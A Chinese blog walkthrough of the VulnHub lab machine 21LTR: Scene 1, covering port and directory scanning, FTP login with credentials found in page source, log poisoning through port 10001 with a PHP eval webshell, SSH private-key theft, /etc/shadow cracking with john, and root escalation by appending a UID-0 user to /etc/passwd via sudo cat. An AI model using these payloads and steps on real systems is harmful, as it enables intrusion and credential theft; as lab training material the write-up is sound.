当前位置: 首页 > news >正文

【vulnhub】Hack the 21LTR: Scene 1 靶机

news 来源:原创 2024/9/20 0:32:01

信息收集

靶机发现

端口开放了21、22、80

目录扫描

访问页面,查看源码的时候发现了一个账号密码

获取shell

尝试ssh连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件

下载下来

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

尝试拼接到刚才目录扫描的目录的logs目录下,发现可以访问到日志文件/logs/backup_log.php

尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口

telnet 192.168.2.120 10001<?php @eval($_REQUEST['cmd']);?>

蚁剑连接

蚁剑连接后,可以查看一下敏感文件

因为有ssh服务,就读取一下密钥

/media/USB_1/Stuff/Keys/id_rsa

赋予权限,然后ssh登录

chmod 600 id_rsassh -i id_rsa hbeale@192.168.2.120
在~/.ssh目录下添加config
cd ~/.ssh
vim configHost *HostKeyAlgorithms +ssh-rsa要是有这个报错的话(sign_and_send_pubkey: no mutual signature supported)
将一下内容写入config
cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

连接成功

提权

可以通过cat提权,所以可以看/etc/shadow文件,或者写入文件,选择读取shadow文件,破解密码

然后将root用户的密码写入1.txt,然后开始破解,但是连接的时候,还是连接不上,应该是配置原因,那么只能写入高权限用户了

cd /usr/share/wordlistsvim 1.txt john --wordlist=rockyou.txt 1.txt

命令生成密码

然后依据/etc/passwd文件的格式写一个aroot用户

sudo /usr/bin/cat >> /etc/passwd
aroot:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash

提权成功

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • C语言-函数
  • k8s—ingress应用
  • 通过提示词越狱解锁学习提示词的新姿势
  • MySQL 迁移 OceanBase 的 Oracle模式中,实现自增主键的方法
  • 【网安第一章】——信息收集
  • RCE---无字母数字webshell
  • 基于php的图书管理系统 可学习使用
  • 数字孪生平台:构建智慧未来,重塑空间智能生态的钥匙
  • Python Flask 与 Node.js Express
  • TM1652段码屏芯片全解析——概况,性能,MCU连接,样例代码
  • 【数据结构】六、图:6.图的最短路径(BFS 算法、迪杰斯特拉(Dijkstra)算法、弗洛伊德(Floyd)算法)
  • 大数据当中常用的一些技术
  • 算法——动态规划:0/1 背包问题
  • springboot系列十二:拦截器和文件上传
  • Git使用错误分析
  • 30天自制操作系统-2
  •  D - 粉碎叛乱F - 其他起义
  • java多线程
  • PHP那些事儿
  • Python学习笔记 字符串拼接
  • SpiderData 2019年2月13日 DApp数据排行榜
  • vue从创建到完整的饿了么(11)组件的使用(svg图标及watch的简单使用)
  • Vue全家桶实现一个Web App
  • weex踩坑之旅第一弹 ~ 搭建具有入口文件的weex脚手架
  • WordPress 获取当前文章下的所有附件/获取指定ID文章的附件(图片、文件、视频)...
  • 给初学者:JavaScript 中数组操作注意点
  • 关于List、List?、ListObject的区别
  • 回顾 Swift 多平台移植进度 #2
  • 前端自动化解决方案
  • 区块链分支循环
  • 什么是Javascript函数节流?
  • 视频flv转mp4最快的几种方法(就是不用格式工厂)
  • 推荐一个React的管理后台框架
  • 详解NodeJs流之一
  • 学习Vue.js的五个小例子
  • ​LeetCode解法汇总307. 区域和检索 - 数组可修改
  • ​软考-高级-系统架构设计师教程(清华第2版)【第9章 软件可靠性基础知识(P320~344)-思维导图】​
  • # 安徽锐锋科技IDMS系统简介
  • #AngularJS#$sce.trustAsResourceUrl
  • (3)(3.5) 遥测无线电区域条例
  • (3)nginx 配置(nginx.conf)
  • (arch)linux 转换文件编码格式
  • (k8s中)docker netty OOM问题记录
  • (办公)springboot配置aop处理请求.
  • (多级缓存)多级缓存
  • (附源码)python房屋租赁管理系统 毕业设计 745613
  • (四)汇编语言——简单程序
  • (一)u-boot-nand.bin的下载
  • (原創) 如何安裝Linux版本的Quartus II? (SOC) (Quartus II) (Linux) (RedHat) (VirtualBox)
  • (转)C#调用WebService 基础
  • (状压dp)uva 10817 Headmaster's Headache
  • .【机器学习】隐马尔可夫模型(Hidden Markov Model,HMM)
  • .gitignore文件_Git:.gitignore
  • .Mobi域名介绍
  • .NET Core中如何集成RabbitMQ